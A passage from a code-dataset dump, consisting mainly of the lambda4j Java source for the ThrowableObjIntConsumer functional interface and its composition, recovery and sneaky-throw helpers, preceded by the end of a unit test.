assertTrue(Name.name(Arrays.asList("a", "b", "C", "DEF")).isMemberReference());
assertFalse(Name.name(Arrays.asList("a", "b", "C", "Def")).isMemberReference());
}
}
|
|
/*
* Copyright (c) 2016 Gridtec. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package at.gridtec.lambda4j.consumer.bi.obj;
import at.gridtec.lambda4j.Lambda;
import at.gridtec.lambda4j.consumer.ThrowableConsumer;
import at.gridtec.lambda4j.consumer.ThrowableIntConsumer;
import at.gridtec.lambda4j.consumer.bi.ThrowableBiBooleanConsumer;
import at.gridtec.lambda4j.consumer.bi.ThrowableBiByteConsumer;
import at.gridtec.lambda4j.consumer.bi.ThrowableBiCharConsumer;
import at.gridtec.lambda4j.consumer.bi.ThrowableBiConsumer;
import at.gridtec.lambda4j.consumer.bi.ThrowableBiDoubleConsumer;
import at.gridtec.lambda4j.consumer.bi.ThrowableBiFloatConsumer;
import at.gridtec.lambda4j.consumer.bi.ThrowableBiIntConsumer;
import at.gridtec.lambda4j.consumer.bi.ThrowableBiLongConsumer;
import at.gridtec.lambda4j.consumer.bi.ThrowableBiShortConsumer;
import at.gridtec.lambda4j.core.exception.ThrownByFunctionalInterfaceException;
import at.gridtec.lambda4j.core.util.ThrowableUtils;
import at.gridtec.lambda4j.function.ThrowableBooleanFunction;
import at.gridtec.lambda4j.function.ThrowableByteFunction;
import at.gridtec.lambda4j.function.ThrowableCharFunction;
import at.gridtec.lambda4j.function.ThrowableDoubleFunction;
import at.gridtec.lambda4j.function.ThrowableFloatFunction;
import at.gridtec.lambda4j.function.ThrowableFunction;
import at.gridtec.lambda4j.function.ThrowableIntFunction;
import at.gridtec.lambda4j.function.ThrowableLongFunction;
import at.gridtec.lambda4j.function.ThrowableShortFunction;
import at.gridtec.lambda4j.function.conversion.ThrowableBooleanToIntFunction;
import at.gridtec.lambda4j.function.conversion.ThrowableByteToIntFunction;
import at.gridtec.lambda4j.function.conversion.ThrowableCharToIntFunction;
import at.gridtec.lambda4j.function.conversion.ThrowableDoubleToIntFunction;
import at.gridtec.lambda4j.function.conversion.ThrowableFloatToIntFunction;
import at.gridtec.lambda4j.function.conversion.ThrowableLongToIntFunction;
import at.gridtec.lambda4j.function.conversion.ThrowableShortToIntFunction;
import at.gridtec.lambda4j.function.to.ThrowableToIntFunction;
import at.gridtec.lambda4j.operator.unary.ThrowableIntUnaryOperator;
import javax.annotation.Nonnegative;
import javax.annotation.Nonnull;
import javax.annotation.Nullable;
import java.util.Objects;
import java.util.function.Function;
import java.util.function.ObjIntConsumer;
/**
* Represents an operation that accepts one object-valued and one {@code int}-valued input argument and returns no
* result which is able to throw any {@link Throwable}. This is a (reference, int) specialization of {@link
* ThrowableBiConsumer}. Unlike most other functional interfaces, {@code ThrowableObjIntConsumer} is expected to operate
* via side-effects.
* <p>
* This is a {@link FunctionalInterface} whose functional method is {@link #acceptThrows(Object, int)}.
*
* @param <T> The type of the first argument to the consumer
* @param <X> The type of the throwable to be thrown by this consumer
* @apiNote This is a throwable JDK lambda.
* @see ThrowableBiConsumer
*/
@SuppressWarnings("unused")
@FunctionalInterface
public interface ThrowableObjIntConsumer<T, X extends Throwable> extends Lambda, ObjIntConsumer<T> {
/**
* Constructs a {@link ThrowableObjIntConsumer} based on a lambda expression or a method reference. Thereby the
* given lambda expression or method reference is returned on an as-is basis to implicitly transform it to the
* desired type. With this method, it is possible to ensure that correct type is used from lambda expression or
* method reference.
*
* @param <T> The type of the first argument to the consumer
* @param <X> The type of the throwable to be thrown by this consumer
* @param expression A lambda expression or (typically) a method reference, e.g. {@code this::method}
* @return A {@code ThrowableObjIntConsumer} from given lambda expression or method reference.
* @implNote This implementation allows the given argument to be {@code null}, but only if {@code null} given,
* {@code null} will be returned.
* @see <a href="https://docs.oracle.com/javase/tutorial/java/javaOO/lambdaexpressions.html#syntax">Lambda
* Expression</a>
* @see <a href="https://docs.oracle.com/javase/tutorial/java/javaOO/methodreferences.html">Method Reference</a>
*/
static <T, X extends Throwable> ThrowableObjIntConsumer<T, X> of(
@Nullable final ThrowableObjIntConsumer<T, X> expression) {
return expression;
}
/**
* Calls the given {@link ThrowableObjIntConsumer} with the given arguments and returns its result.
*
* @param <T> The type of the first argument to the consumer
* @param <X> The type of the throwable to be thrown by this consumer
* @param consumer The consumer to be called
* @param t The first argument to the consumer
* @param value The second argument to the consumer
* @throws NullPointerException If given argument is {@code null}
* @throws X Any throwable from this consumers action
*/
static <T, X extends Throwable> void call(@Nonnull final ThrowableObjIntConsumer<? super T, ? extends X> consumer,
T t, int value) throws X {
Objects.requireNonNull(consumer);
consumer.acceptThrows(t, value);
}
/**
* Creates a {@link ThrowableObjIntConsumer} which uses the {@code first} parameter of this one as argument for the
* given {@link ThrowableConsumer}.
*
* @param <T> The type of the first argument to the consumer
* @param <X> The type of the throwable to be thrown by this consumer
* @param consumer The consumer which accepts the {@code first} parameter of this one
* @return Creates a {@code ThrowableObjIntConsumer} which uses the {@code first} parameter of this one as argument
* for the given {@code ThrowableConsumer}.
* @throws NullPointerException If given argument is {@code null}
*/
@Nonnull
static <T, X extends Throwable> ThrowableObjIntConsumer<T, X> onlyFirst(
@Nonnull final ThrowableConsumer<? super T, ? extends X> consumer) {
Objects.requireNonNull(consumer);
return (t, value) -> consumer.acceptThrows(t);
}
/**
* Creates a {@link ThrowableObjIntConsumer} which uses the {@code second} parameter of this one as argument for the
* given {@link ThrowableIntConsumer}.
*
* @param <T> The type of the first argument to the consumer
* @param <X> The type of the throwable to be thrown by this consumer
* @param consumer The consumer which accepts the {@code second} parameter of this one
* @return Creates a {@code ThrowableObjIntConsumer} which uses the {@code second} parameter of this one as argument
* for the given {@code ThrowableIntConsumer}.
* @throws NullPointerException If given argument is {@code null}
*/
@Nonnull
static <T, X extends Throwable> ThrowableObjIntConsumer<T, X> onlySecond(
@Nonnull final ThrowableIntConsumer<? extends X> consumer) {
Objects.requireNonNull(consumer);
return (t, value) -> consumer.acceptThrows(value);
}
/**
* Applies this consumer to the given arguments.
*
* @param t The first argument to the consumer
* @param value The second argument to the consumer
* @throws X Any throwable from this consumers action
*/
void acceptThrows(T t, int value) throws X;
/**
* Applies this consumer to the given arguments.
*
* @param t The first argument to the consumer
* @param value The second argument to the consumer
* @apiNote This method mainly exists to use this {@link ThrowableObjIntConsumer} in JRE specific methods only
* accepting {@link ObjIntConsumer}. If this consumer should be applied, then the {@link #acceptThrows(Object, int)}
* method should be used.
* @apiNote Overrides the {@link ObjIntConsumer#accept(Object, int)} method by using a redefinition as default
* method. This implementation calls the {@link #acceptThrows(Object, int)} method of this function and catches the
* eventually thrown {@link Throwable} from it. If it is of type {@link RuntimeException} or {@link Error} it is
* rethrown as is. Other {@code Throwable} types are wrapped in a {@link ThrownByFunctionalInterfaceException}.
*/
@Override
default void accept(T t, int value) {
// TODO: Remove commented code below
/*try {
this.acceptThrows(t, value);
} catch (RuntimeException | Error e) {
throw e;
} catch (Throwable throwable) {
throw new ThrownByFunctionalInterfaceException(throwable.getMessage(), throwable);
}*/
nest().accept(t, value);
}
/**
* Applies this consumer partially to some arguments of this one, producing a {@link ThrowableIntConsumer} as
* result.
*
* @param t The first argument to this consumer used to partially apply this function
* @return A {@code ThrowableIntConsumer} that represents this consumer partially applied the some arguments.
*/
@Nonnull
default ThrowableIntConsumer<X> pacceptThrows(T t) {
return (value) -> this.acceptThrows(t, value);
}
/**
* Applies this consumer partially to some arguments of this one, producing a {@link ThrowableConsumer} as result.
*
* @param value The second argument to this consumer used to partially apply this function
* @return A {@code ThrowableConsumer} that represents this consumer partially applied the some arguments.
*/
@Nonnull
default ThrowableConsumer<T, X> pacceptThrows(int value) {
return (t) -> this.acceptThrows(t, value);
}
/**
* Returns the number of arguments for this consumer.
*
* @return The number of arguments for this consumer.
* @implSpec The default implementation always returns {@code 2}.
*/
@Nonnegative
default int arity() {
return 2;
}
/**
* Returns a composed {@link ThrowableBiConsumer} that first applies the {@code before} functions to its input, and
* then applies this consumer to the result.
*
* @param <A> The type of the argument to the first given function, and of composed consumer
* @param <B> The type of the argument to the second given function, and of composed consumer
* @param before1 The first function to apply before this consumer is applied
* @param before2 The second function to apply before this consumer is applied
* @return A composed {@code ThrowableBiConsumer} that first applies the {@code before} functions to its input, and
* then applies this consumer to the result.
* @throws NullPointerException If given argument is {@code null}
* @implSpec The input argument of this method is able to handle every type.
*/
@Nonnull
default <A, B> ThrowableBiConsumer<A, B, X> compose(
@Nonnull final ThrowableFunction<? super A, ? extends T, ? extends X> before1,
@Nonnull final ThrowableToIntFunction<? super B, ? extends X> before2) {
Objects.requireNonNull(before1);
Objects.requireNonNull(before2);
return (a, b) -> acceptThrows(before1.applyThrows(a), before2.applyAsIntThrows(b));
}
/**
* Returns a composed {@link ThrowableBiBooleanConsumer} that first applies the {@code before} functions to its
* input, and then applies this consumer to the result. This method is just convenience, to provide the ability to
* execute an operation which accepts {@code boolean} input, before this primitive consumer is executed.
*
* @param before1 The first function to apply before this consumer is applied
* @param before2 The second function to apply before this consumer is applied
* @return A composed {@code ThrowableBiBooleanConsumer} that first applies the {@code before} functions to its
* input, and then applies this consumer to the result.
* @throws NullPointerException If given argument is {@code null}
* @implSpec The input argument of this method is a able to handle primitive values. In this case this is {@code
* boolean}.
*/
@Nonnull
default ThrowableBiBooleanConsumer<X> composeFromBoolean(
@Nonnull final ThrowableBooleanFunction<? extends T, ? extends X> before1,
@Nonnull final ThrowableBooleanToIntFunction<? extends X> before2) {
Objects.requireNonNull(before1);
Objects.requireNonNull(before2);
return (value1, value2) -> acceptThrows(before1.applyThrows(value1), before2.applyAsIntThrows(value2));
}
/**
* Returns a composed {@link ThrowableBiByteConsumer} that first applies the {@code before} functions to
* its input, and then applies this consumer to the result.
* This method is just convenience, to provide the ability to execute an operation which accepts {@code byte} input,
* before this primitive consumer is executed.
*
* @param before1 The first function to apply before this consumer is applied
* @param before2 The second function to apply before this consumer is applied
* @return A composed {@code ThrowableBiByteConsumer} that first applies the {@code before} functions to its input,
* and then applies this consumer to the result.
* @throws NullPointerException If given argument is {@code null}
* @implSpec The input argument of this method is a able to handle primitive values. In this case this is {@code
* byte}.
*/
@Nonnull
default ThrowableBiByteConsumer<X> composeFromByte(
@Nonnull final ThrowableByteFunction<? extends T, ? extends X> before1,
@Nonnull final ThrowableByteToIntFunction<? extends X> before2) {
Objects.requireNonNull(before1);
Objects.requireNonNull(before2);
return (value1, value2) -> acceptThrows(before1.applyThrows(value1), before2.applyAsIntThrows(value2));
}
/**
* Returns a composed {@link ThrowableBiCharConsumer} that first applies the {@code before} functions to
* its input, and then applies this consumer to the result.
* This method is just convenience, to provide the ability to execute an operation which accepts {@code char} input,
* before this primitive consumer is executed.
*
* @param before1 The first function to apply before this consumer is applied
* @param before2 The second function to apply before this consumer is applied
* @return A composed {@code ThrowableBiCharConsumer} that first applies the {@code before} functions to its input,
* and then applies this consumer to the result.
* @throws NullPointerException If given argument is {@code null}
* @implSpec The input argument of this method is a able to handle primitive values. In this case this is {@code
* char}.
*/
@Nonnull
default ThrowableBiCharConsumer<X> composeFromChar(
@Nonnull final ThrowableCharFunction<? extends T, ? extends X> before1,
@Nonnull final ThrowableCharToIntFunction<? extends X> before2) {
Objects.requireNonNull(before1);
Objects.requireNonNull(before2);
return (value1, value2) -> acceptThrows(before1.applyThrows(value1), before2.applyAsIntThrows(value2));
}
/**
* Returns a composed {@link ThrowableBiDoubleConsumer} that first applies the {@code before} functions to its
* input, and then applies this consumer to the result. This method is just convenience, to provide the ability to
* execute an operation which accepts {@code double} input, before this primitive consumer is executed.
*
* @param before1 The first function to apply before this consumer is applied
* @param before2 The second function to apply before this consumer is applied
* @return A composed {@code ThrowableBiDoubleConsumer} that first applies the {@code before} functions to its
* input, and then applies this consumer to the result.
* @throws NullPointerException If given argument is {@code null}
* @implSpec The input argument of this method is a able to handle primitive values. In this case this is {@code
* double}.
*/
@Nonnull
default ThrowableBiDoubleConsumer<X> composeFromDouble(
@Nonnull final ThrowableDoubleFunction<? extends T, ? extends X> before1,
@Nonnull final ThrowableDoubleToIntFunction<? extends X> before2) {
Objects.requireNonNull(before1);
Objects.requireNonNull(before2);
return (value1, value2) -> acceptThrows(before1.applyThrows(value1), before2.applyAsIntThrows(value2));
}
/**
* Returns a composed {@link ThrowableBiFloatConsumer} that first applies the {@code before} functions to its input,
* and then applies this consumer to the result. This method is just convenience, to provide the ability to execute
* an operation which accepts {@code float} input, before this primitive consumer is executed.
*
* @param before1 The first function to apply before this consumer is applied
* @param before2 The second function to apply before this consumer is applied
* @return A composed {@code ThrowableBiFloatConsumer} that first applies the {@code before} functions to its input,
* and then applies this consumer to the result.
* @throws NullPointerException If given argument is {@code null}
* @implSpec The input argument of this method is a able to handle primitive values. In this case this is {@code
* float}.
*/
@Nonnull
default ThrowableBiFloatConsumer<X> composeFromFloat(
@Nonnull final ThrowableFloatFunction<? extends T, ? extends X> before1,
@Nonnull final ThrowableFloatToIntFunction<? extends X> before2) {
Objects.requireNonNull(before1);
Objects.requireNonNull(before2);
return (value1, value2) -> acceptThrows(before1.applyThrows(value1), before2.applyAsIntThrows(value2));
}
/**
* Returns a composed {@link ThrowableBiIntConsumer} that first applies the {@code before} functions to
* its input, and then applies this consumer to the result.
* This method is just convenience, to provide the ability to execute an operation which accepts {@code int} input,
* before this primitive consumer is executed.
*
* @param before1 The first function to apply before this consumer is applied
* @param before2 The second operator to apply before this consumer is applied
* @return A composed {@code ThrowableBiIntConsumer} that first applies the {@code before} functions to its input,
* and then applies this consumer to the result.
* @throws NullPointerException If given argument is {@code null}
* @implSpec The input argument of this method is a able to handle primitive values. In this case this is {@code
* int}.
*/
@Nonnull
default ThrowableBiIntConsumer<X> composeFromInt(
@Nonnull final ThrowableIntFunction<? extends T, ? extends X> before1,
@Nonnull final ThrowableIntUnaryOperator<? extends X> before2) {
Objects.requireNonNull(before1);
Objects.requireNonNull(before2);
return (value1, value2) -> acceptThrows(before1.applyThrows(value1), before2.applyAsIntThrows(value2));
}
/**
* Returns a composed {@link ThrowableBiLongConsumer} that first applies the {@code before} functions to
* its input, and then applies this consumer to the result.
* This method is just convenience, to provide the ability to execute an operation which accepts {@code long} input,
* before this primitive consumer is executed.
*
* @param before1 The first function to apply before this consumer is applied
* @param before2 The second function to apply before this consumer is applied
* @return A composed {@code ThrowableBiLongConsumer} that first applies the {@code before} functions to its input,
* and then applies this consumer to the result.
* @throws NullPointerException If given argument is {@code null}
* @implSpec The input argument of this method is a able to handle primitive values. In this case this is {@code
* long}.
*/
@Nonnull
default ThrowableBiLongConsumer<X> composeFromLong(
@Nonnull final ThrowableLongFunction<? extends T, ? extends X> before1,
@Nonnull final ThrowableLongToIntFunction<? extends X> before2) {
Objects.requireNonNull(before1);
Objects.requireNonNull(before2);
return (value1, value2) -> acceptThrows(before1.applyThrows(value1), before2.applyAsIntThrows(value2));
}
/**
* Returns a composed {@link ThrowableBiShortConsumer} that first applies the {@code before} functions to its input,
* and then applies this consumer to the result. This method is just convenience, to provide the ability to execute
* an operation which accepts {@code short} input, before this primitive consumer is executed.
*
* @param before1 The first function to apply before this consumer is applied
* @param before2 The second function to apply before this consumer is applied
* @return A composed {@code ThrowableBiShortConsumer} that first applies the {@code before} functions to its input,
* and then applies this consumer to the result.
* @throws NullPointerException If given argument is {@code null}
* @implSpec The input argument of this method is a able to handle primitive values. In this case this is {@code
* short}.
*/
@Nonnull
default ThrowableBiShortConsumer<X> composeFromShort(
@Nonnull final ThrowableShortFunction<? extends T, ? extends X> before1,
@Nonnull final ThrowableShortToIntFunction<? extends X> before2) {
Objects.requireNonNull(before1);
Objects.requireNonNull(before2);
return (value1, value2) -> acceptThrows(before1.applyThrows(value1), before2.applyAsIntThrows(value2));
}
/**
* Returns a composed {@link ThrowableObjIntConsumer} that performs, in sequence, this consumer followed by the
* {@code after} consumer. If performing this consumer throws an exception, the {@code after} consumer will not be
* performed.
*
* @param after The consumer to apply after this consumer is applied
* @return A composed {@link ThrowableObjIntConsumer} that performs, in sequence, this consumer followed by the
* {@code after} consumer.
* @throws NullPointerException If given argument is {@code null}
*/
@Nonnull
default ThrowableObjIntConsumer<T, X> andThen(
@Nonnull final ThrowableObjIntConsumer<? super T, ? extends X> after) {
Objects.requireNonNull(after);
return (t, value) -> {
acceptThrows(t, value);
after.acceptThrows(t, value);
};
}
/**
* Returns a composed {@link ThrowableBiConsumer} which represents this {@link ThrowableObjIntConsumer}. Thereby the
* primitive input argument for this consumer is autoboxed. This method provides the possibility to use this {@code
* ThrowableObjIntConsumer} with methods provided by the {@code JDK}.
*
* @return A composed {@code ThrowableBiConsumer} which represents this {@code ThrowableObjIntConsumer}.
*/
@Nonnull
default ThrowableBiConsumer<T, Integer, X> boxed() {
return this::acceptThrows;
}
/**
* Returns a composed {@link ObjIntConsumer2} that applies this consumer to its input and nests the thrown {@link
* Throwable} from it. The {@code Throwable} is nested (wrapped) in a {@link ThrownByFunctionalInterfaceException},
* which is constructed from the thrown {@code Throwable}s message and the thrown {@code Throwable} itself.
*
* @return A composed {@link ObjIntConsumer2} that applies this consumer to its input and nests the thrown {@code
* Throwable} from it.
* @implNote If thrown {@code Throwable} is of type {@link Error} it is thrown as-is and thus not nested.
* @see #nest(Function)
* @see ThrownByFunctionalInterfaceException
*/
@Nonnull
default ObjIntConsumer2<T> nest() {
return nest(throwable -> new ThrownByFunctionalInterfaceException(throwable.getMessage(), throwable));
}
/**
* Returns a composed {@link ObjIntConsumer2} that applies this consumer to its input and nests the thrown {@link
* Throwable} from it using {@code mapper} operation. Thereby {@code mapper} may modify the thrown {@code
* Throwable}, regarding its implementation, and returns it nested (wrapped) in a {@link RuntimeException}.
*
* @param mapper The operation to map the thrown {@code Throwable} to {@code RuntimeException}
* @return A composed {@link ObjIntConsumer2} that applies this consumer to its input and nests the thrown {@code
* Throwable} from it using {@code mapper} operation.
* @throws NullPointerException If given argument is {@code null}
* @implNote If thrown {@code Throwable} is of type {@link Error} it is thrown as-is and thus not nested.
* @see #nest()
*/
@Nonnull
default ObjIntConsumer2<T> nest(@Nonnull final Function<? super Throwable, ? extends RuntimeException> mapper) {
return recover(throwable -> {
throw mapper.apply(throwable);
});
}
/**
* Returns a composed {@link ObjIntConsumer2} that first applies this consumer to its input, and then applies the
* {@code recover} operation if a {@link Throwable} is thrown from this one. The {@code recover} operation is
* represented by a curried operation which is called with throwable information and same arguments of this
* consumer.
*
* @param recover The operation to apply if this consumer throws a {@code Throwable}
* @return A composed {@link ObjIntConsumer2} that first applies this consumer to its input, and then applies the
* {@code recover} operation if a {@code Throwable} is thrown from this one.
* @throws NullPointerException If given argument or the returned enclosing consumer is {@code null}
* @implSpec The implementation checks that the returned enclosing consumer from {@code recover} operation is not
* {@code null}. If it is, then a {@link NullPointerException} with appropriate message is thrown.
* @implNote If thrown {@code Throwable} is of type {@link Error}, it is thrown as-is and thus not passed to {@code
* recover} operation.
*/
@Nonnull
default ObjIntConsumer2<T> recover(
@Nonnull final Function<? super Throwable, ? extends ObjIntConsumer<? super T>> recover) {
Objects.requireNonNull(recover);
return (t, value) -> {
try {
this.acceptThrows(t, value);
} catch (Error e) {
throw e;
} catch (Throwable throwable) {
final ObjIntConsumer<? super T> consumer = recover.apply(throwable);
Objects.requireNonNull(consumer, () -> "recover returned null for " + throwable.getClass() + ": "
+ throwable.getMessage());
consumer.accept(t, value);
}
};
}
/**
* Returns a composed {@link ObjIntConsumer2} that applies this consumer to its input and sneakily throws the
* thrown {@link Throwable} from it, if it is not of type {@link RuntimeException} or {@link Error}. This means that
* each throwable thrown from the returned composed consumer behaves exactly the same as an <em>unchecked</em>
* throwable does. As a result, there is no need to handle the throwable of this consumer in the returned composed
* consumer by either wrapping it in an <em>unchecked</em> throwable or to declare it in the {@code throws} clause,
* as it would be done in a non sneaky throwing consumer.
* <p>
* What sneaky throwing simply does, is to fake out the compiler and thus it bypasses the principle of
* <em>checked</em> throwables. On the JVM (class file) level, all throwables, checked or not, can be thrown
* regardless of the {@code throws} clause of methods, which is why this works at all.
* <p>
* However, when using this method to get a sneaky throwing consumer variant of this throwable consumer, the
* following advantages, disadvantages and limitations will apply:
* <p>
* If the calling-code is to handle the sneakily thrown throwable, it is required to add it to the {@code throws}
* clause of the method that applies the returned composed consumer. The compiler will not force the declaration in
* the {@code throws} clause anymore.
* <p>
* If the calling-code already handles the sneakily thrown throwable, the compiler requires it to be added to the
* {@code throws} clause of the method that applies the returned composed consumer. If not added, the compiler will
* error that the caught throwable is never thrown in the corresponding {@code try} block.
* <p>
* If the returned composed consumer is directly surrounded by a {@code try}-{@code catch} block to catch the
* sneakily thrown throwable from it, the compiler will error that the caught throwable is never thrown in the
* corresponding {@code try} block.
* <p>
* In any case, if the throwable is not added to the to the {@code throws} clause of the method that applies the
* returned composed consumer, the calling-code won't be able to catch the throwable by name. It will bubble and
* probably be caught in some {@code catch} statement, catching a base type such as {@code try { ... }
* catch(RuntimeException e) { ... }} or {@code try { ... } catch(Exception e) { ... }}, but perhaps this is
* intended.
* <p>
* When the called code never throws the specific throwable that it declares, it should obviously be omitted. For
* example: {@code new String(byteArr, "UTF-8") throws UnsupportedEncodingException}, but {@code UTF-8} is
* guaranteed by the Java specification to be always present. Here, the {@code throws} declaration is a nuisance and
* any solution to silence it with minimal boilerplate is welcome. The throwable should therefore be omitted in the
* {@code throws} clause of the method that applies the returned composed consumer.
* <p>
* With all that mentioned, the following example will demonstrate this methods correct use:
* <pre>{@code
* // when called with illegal value ClassNotFoundException is thrown
* public Class<?> sneakyThrowingFunctionalInterface(final String className) throws ClassNotFoundException {
* return ThrowableFunction.of(Class::forName) // create the correct throwable functional interface
* .sneakyThrow() // create a non-throwable variant which is able to sneaky throw (this method)
* .apply(className); // apply non-throwable variant -> may sneaky throw a throwable
* }
*
* // call the the method which surround the sneaky throwing functional interface
* public void callingMethod() {
* try {
* final Class<?> clazz = sneakyThrowingFunctionalInterface("some illegal class name");
* // ... do something with clazz ...
* } catch(ClassNotFoundException e) {
* // ... do something with e ...
* }
* }
* }</pre>
* In conclusion, this somewhat contentious ability should be used carefully, of course, with the advantages,
* disadvantages and limitations described above kept in mind.
*
* @return A composed {@link ObjIntConsumer2} that applies this consumer to its input and sneakily throws the thrown
* {@link Throwable} from it, unless it is of type {@link RuntimeException} or {@link Error}.
* @implNote If thrown {@link Throwable} is of type {@link RuntimeException} or {@link Error}, it is thrown as-is
* and thus not sneakily thrown.
*/
@Nonnull
default ObjIntConsumer2<T> sneakyThrow() {
return (t, value) -> {
try {
this.acceptThrows(t, value);
} catch (RuntimeException | Error e) {
throw e;
} catch (Throwable throwable) {
throw ThrowableUtils.sneakyThrow(throwable);
}
};
}
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.